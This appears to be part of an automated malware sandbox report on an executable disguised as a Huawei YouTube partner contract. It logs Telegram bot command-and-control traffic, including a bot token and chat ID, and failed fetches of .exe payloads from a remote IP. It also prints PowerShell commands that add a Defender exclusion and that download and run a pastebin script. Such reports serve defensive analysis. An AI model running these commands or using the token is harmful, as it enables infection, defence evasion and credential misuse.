                                                                                                                                                                                            2025-02-17 18:37:11 UTC253OUTData Raw: 63 68 61 74 5f 69 64 3d 2d 34 36 34 32 34 30 34 39 39 36 26 74 65 78 74 3d 25 44 30 25 39 45 25 44 31 25 38 38 25 44 30 25 42 38 25 44 30 25 42 31 25 44 30 25 42 41 25 44 30 25 42 30 2b 25 44 30 25 42 46 25 44 31 25 38 30 25 44 30 25 42 38 2b 25 44 30 25 42 37 25 44 30 25 42 30 25 44 30 25 42 33 25 44 31 25 38 30 25 44 31 25 38 33 25 44 30 25 42 37 25 44 30 25 42 41 25 44 30 25 42 35 2b 25 44 31 25 38 34 25 44 30 25 42 30 25 44 30 25 42 39 25 44 30 25 42 42 25 44 30 25 42 30 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 38 39 2e 32 33 2e 39 37 2e 32 31 34 25 32 46 54 65 61 6d 25 32 46 42 49 4c 4c 49 2e 65 78 65 25 33 41 2b 41 6e 2b 65 72 72 6f 72 2b 6f 63 63 75 72 72 65 64 2b 77 68 69 6c 65 2b 73 65 6e 64 69 6e 67 2b 74 68 65 2b 72 65 71 75 65 73 74 2e
                                                                                                                                                                                            Data Ascii: chat_id=-4642404996&text=%D0%9E%D1%88%D0%B8%D0%B1%D0%BA%D0%B0+%D0%BF%D1%80%D0%B8+%D0%B7%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%B5+%D1%84%D0%B0%D0%B9%D0%BB%D0%B0+http%3A%2F%2F89.23.97.214%2FTeam%2FBILLI.exe%3A+An+error+occurred+while+sending+the+request.
                                                                                                                                                                                            2025-02-17 18:37:12 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                            Date: Mon, 17 Feb 2025 18:37:12 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Content-Length: 58
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                            2025-02-17 18:37:12 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.650002149.154.167.2204432356C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2025-02-17 18:37:12 UTC174OUTPOST /bot7529774093:AAF3iNvYZOShB_j-3WVxQo0gVFdczpL8Wu8/sendMessage HTTP/1.1
                                                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            Content-Length: 252
                                                                                                                                                                                            2025-02-17 18:37:12 UTC252OUTData Raw: 63 68 61 74 5f 69 64 3d 2d 34 36 34 32 34 30 34 39 39 36 26 74 65 78 74 3d 25 44 30 25 39 45 25 44 31 25 38 38 25 44 30 25 42 38 25 44 30 25 42 31 25 44 30 25 42 41 25 44 30 25 42 30 2b 25 44 30 25 42 46 25 44 31 25 38 30 25 44 30 25 42 38 2b 25 44 30 25 42 37 25 44 30 25 42 30 25 44 30 25 42 33 25 44 31 25 38 30 25 44 31 25 38 33 25 44 30 25 42 37 25 44 30 25 42 41 25 44 30 25 42 35 2b 25 44 31 25 38 34 25 44 30 25 42 30 25 44 30 25 42 39 25 44 30 25 42 42 25 44 30 25 42 30 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 38 39 2e 32 33 2e 39 37 2e 32 31 34 25 32 46 54 65 61 6d 25 32 46 33 32 63 76 2e 65 78 65 25 33 41 2b 41 6e 2b 65 72 72 6f 72 2b 6f 63 63 75 72 72 65 64 2b 77 68 69 6c 65 2b 73 65 6e 64 69 6e 67 2b 74 68 65 2b 72 65 71 75 65 73 74 2e
                                                                                                                                                                                            Data Ascii: chat_id=-4642404996&text=%D0%9E%D1%88%D0%B8%D0%B1%D0%BA%D0%B0+%D0%BF%D1%80%D0%B8+%D0%B7%D0%B0%D0%B3%D1%80%D1%83%D0%B7%D0%BA%D0%B5+%D1%84%D0%B0%D0%B9%D0%BB%D0%B0+http%3A%2F%2F89.23.97.214%2FTeam%2F32cv.exe%3A+An+error+occurred+while+sending+the+request.
                                                                                                                                                                                            2025-02-17 18:37:12 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                            Date: Mon, 17 Feb 2025 18:37:12 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Content-Length: 58
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                            2025-02-17 18:37:12 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                                                                                                            Statistics

                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Behavior

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            System Behavior

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:13:35:20
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe"
                                                                                                                                                                                            Imagebase:0x7ff779c00000
                                                                                                                                                                                            File size:72'795'027 bytes
                                                                                                                                                                                            MD5 hash:DD0B202977B83E0C52C2537616C7A620
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:13:35:21
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                            Start time:13:35:21
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                            Start time:13:35:22
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                            Start time:13:35:22
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                            Start time:13:35:25
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"
                                                                                                                                                                                            Imagebase:0x7ff6e7780000
                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                            Start time:13:35:25
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP"
                                                                                                                                                                                            Imagebase:0x7ff73e480000
                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                            Start time:13:35:35
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                            Start time:13:35:35
                                                                                                                                                                                            Start date:17/02/2025
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Reset < >